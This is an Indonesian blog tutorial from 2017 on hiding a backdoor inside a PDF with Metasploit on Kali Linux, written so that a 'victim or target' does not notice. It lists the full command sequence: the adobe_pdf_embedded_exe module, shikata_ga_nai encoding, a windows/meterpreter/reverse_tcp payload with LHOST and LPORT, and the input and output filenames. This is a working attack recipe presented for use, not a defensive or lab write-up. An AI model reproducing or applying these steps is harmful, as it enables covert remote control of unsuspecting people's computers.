Sabtu, 16 September 2017

Cara Menyisipkan Backdoor ke PDF, Metasploit on Kali Linux

Apakabar sob sudah lama kita tak bertemu ya sob, seperti biasanya sob di sini saya akan sedikit menjelaskan tentang Bagaimanasih Cara Menyisipkan/Menyematkan Backdoor ke PDF ,Metasploit on Kali Linux.
Cara Menyisipkan Backdoor ke PDF, Metasploit on Kali Linux

Dalam melakukan aksi remoting mobile, salah satu yang harus di perhatikan ialah bagaimana sih cara mengirim backdoornya agar mendapatkan access remote nya, terkadang seseorang akan mencurigai jika Backdoornya Terang-terangan filenya tidak jelas lisensinya, Jadi dalam kesempatan ini saya akan memanipulasi backdoornya ke dalam PDF sehingga victim atau target tidak akan menyadari bahwa itu adalah backdoor.

Pengertian Metasploit

Metasploit merupakan sebuah software atau sebuah tools yang berfungsi untuk menguji coba ketahanan pada suatu sistem dengan cara mengeksploitasi software terhadap suatu sistem. Metasploit di buat oleh perusahaan HD Moore pada tahun 2003 yang dijadikan sebagai alat jaringan portabel dengan menggunakan bahasa pemograman Perl. Kemudian metasploit ditulis ulang atau rewrite ke dalam baha pemograman Ruby pada tanggal 21 Oktober 2009.

Ok Langsung saja ya simak artikel di bawah ini ya sob: )
 
Sebelum memulainya sediakan dulu pdf yang akan di sisipkan backdoornya.
disini saya menyediakan pdfnya di Desktop saya.

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

1. Pertama-tama masuk ke console msfnya terlebih dahulu dengan mengetikkan

#msfconsole
Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

2. Untuk menyisipkan backdoor ke pdf sobat harus menggunakan

#use window/fileformat/adobe_pdf_embedded_exe

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

3. Set type bit nya dengan mengetikkan

#set msfencode x86/shikata_ga_nai 

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

 4. Setelah itu set type payloadnya disini saya menggunakan payload via tcp, untuk mengsetnya dengan mengetikkan

 #set payload windows/meterpreter/reverse_tcp


Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

5. Setelah itu menerapkan atau meng set lhost sobat,disini sobat isikan ip local atau ip public, untuk remote beda jaringan via wan sobat harus menggunakan ip public, disini saya menggunakan ip local, untuk mengsetnya dengan mengetikkan #set lhost 192.168.1.100

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

6. Setelah melakukkan set lhost, langkah selanjutnya adalah set lport, disini saya menggunakan port 445, untuk mengsetnya dengan mengetikkan

#set lport 445

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

 7. Setelah itu sobat dimintai untuk menentukkan nama hasil dari pembuatan backdoor yang akan di sisipkan kedalam pdf, disini saya menamai backdoornya dengan pdf_hasil.pdf, untuk menentukkannnya dengan mengetikkan

#set filename pdf_hasil.pdf

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

8. Setelah sobat menentukkan hasil nama backdoornya, langkah selanjutnya ialah menentukkan atau menyisipkan pdf yang telah di sediakan tadi, sebelumnya tadi saya menyediakan pdfnya di simpan di folder Desktop pc saya, untuk menyisipkan pdfnya tinggal mengetikkan

#set infilename '/root/Desktop/Kali_Linux.pdf'


Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

9. Langkah Terakhir dalam penyisipan backdoor ke pdf ialah dengan mengetikkan #exploit


Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux

10. Secara otomatis backdoor bertype pdf akan di buat, dan hasilnya seperti gambar di bawah ini.



Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux
dari gambar di atas kita bisa menentukkan bahwa hasil dari backdoornya terletak di folder /root/.msf4/local/pdf_hasil.pdf

Cara Menyisipka Backdoor ke PDF, Metasploit on Kali Linux


dalam tutorial ini di sini saya hanya membuat backdoor pdf nya saja ya sob, dalam tahap selanjutnya sobat bisa mempelajari link di bawah ini: )


Hanya segitu yang bisa saya sampaikan, jika sobat mengalami kesulitan dalam melakukan konfigurasi di atas sobat bisa menanyakan langsung ke Admin Web ini di laman Contact di bagian menu paling atas, semoga bermanfaat ya sob: )